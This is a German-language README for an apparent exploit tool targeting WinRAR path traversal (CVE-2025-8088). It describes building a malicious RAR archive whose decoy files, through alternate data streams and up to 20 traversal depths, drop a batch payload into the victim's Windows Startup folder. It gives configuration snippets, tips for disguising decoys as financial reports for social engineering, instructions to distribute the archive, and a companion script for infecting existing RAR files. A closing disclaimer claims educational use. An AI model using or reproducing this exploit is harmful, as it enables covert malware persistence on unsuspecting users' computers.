
Systeme ausnutzen, die ältere WinRAR-Versionen verwenden, ohne deren Benutzernamen zu kennen (anders als andere Projekte)


Dieses Python-Skript nutzt eine Path-Traversal-Schwachstelle (CVE-2025-8088) in WinRAR aus, um Payloads über mehrere relative Pfad-Tiefen im Windows-Autostart-Ordner zu platzieren. Der Exploit erstellt ein schädliches RAR-Archiv, das beim Entpacken Payloads in den Autostart-Ordner des Opfers auf verschiedenen Verzeichnisebenen schreibt.
Das Skript erstellt mehrere Tarn-Dateien (standardmäßig 20), die jeweils so konfiguriert sind, dass sie eine unterschiedliche Anzahl übergeordneter Verzeichnisse durchlaufen:
NUM_DEPTHS = 20 # Anzahl verschiedener Traversal-Tiefen
Jede Datei verwendet eine andere Pfad-Tiefe:
File1.txt → ..\Startup\payload.bat
File2.txt → ..\..\Startup\payload.bat
...
File20.txt → ..\..\..\ (20-mal) \Startup\payload.bat
✅ Stellt sicher, dass egal wo das Opfer das Archiv entpackt (Desktop, Dokumente, Downloads oder verschachtelte Ordner), mindestens ein Payload den Autostart-Ordner erreicht.
Die Tarn-Dateien enthalten standardmäßig generischen Text, sollten jedoch für realistisches Social Engineering angepasst werden:
# Überzeugenderen Tarn-Inhalt erstellen
decoy.write_text("Quarterly Financial Report Q3 2025.docx\n", encoding="utf-8")
Warum den Tarn-Inhalt ändern?
Der Payload ist standardmäßig ein einfaches Batch-Skript, kann aber durch jede ausführbare Datei ersetzt werden:
PAYLOAD = "@echo off\necho Payload executed!\npause\n"
Speicherort des Payloads:
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.bat
Das finale schädliche RAR-Archiv wird gespeichert als:
OUT_RAR = "exploit.rar"
Die Erzeugung dieses Exploits erfordert aus mehreren Gründen eine Windows-Umgebung:
Abhängigkeit von Alternate Data Streams (ADS)
Nur-NTFS-Funktion zum Anhängen von Payloads:
ads_path = f"{decoy}:{placeholder}" # Windows-spezifische NTFS-Syntax
Anforderung der WinRAR-Ausführbaren Datei
Nutzt die Windows-CLI von WinRAR:
subprocess.run(f'"{rar_exe}" a -ep -os "{base_rar}" ...')
Kompatibilität der Pfadstruktur
Ziel sind Windows-spezifische Pfade:
RELATIVE_DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu..."
Ausführung des Payloads
Erzeugt Windows-Batch-Dateien:
@echo off
start /B notepad.exe
Konfiguration anpassen:
# Konfiguration
NUM_DEPTHS = 20
RELATIVE_DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat"
PAYLOAD = "@echo off\nstart /B notepad.exe\n" # Dein eigentlicher Payload
DECOY_FILE_PREFIX = "Financial_Report_Q3_" # Überzeugendere Namen
Skript ausführen:
python CVE-2025-8088.py
Die Ausgabe verteilen:
exploit.rarDiese Version des Codes ermöglicht es dir einfach, so etwas auszuführen:
python3 infect_premade_rarfiles.py website_backup.rar
Sie extrahiert alle Dateien, injiziert diejenigen, bei denen dies möglich ist, z. B. .txt, srt, sql (Nicht alle Dateitypen funktionieren), und erstellt dann die einsatzbereite RAR-Datei.
⚠️ Dieses Tool dient ausschließlich Bildungs- und Sicherheitsforschungszwecken.
Verwende es niemals gegen Systeme ohne ausdrückliche Genehmigung. Unautorisierte Nutzung ist illegal und unethisch.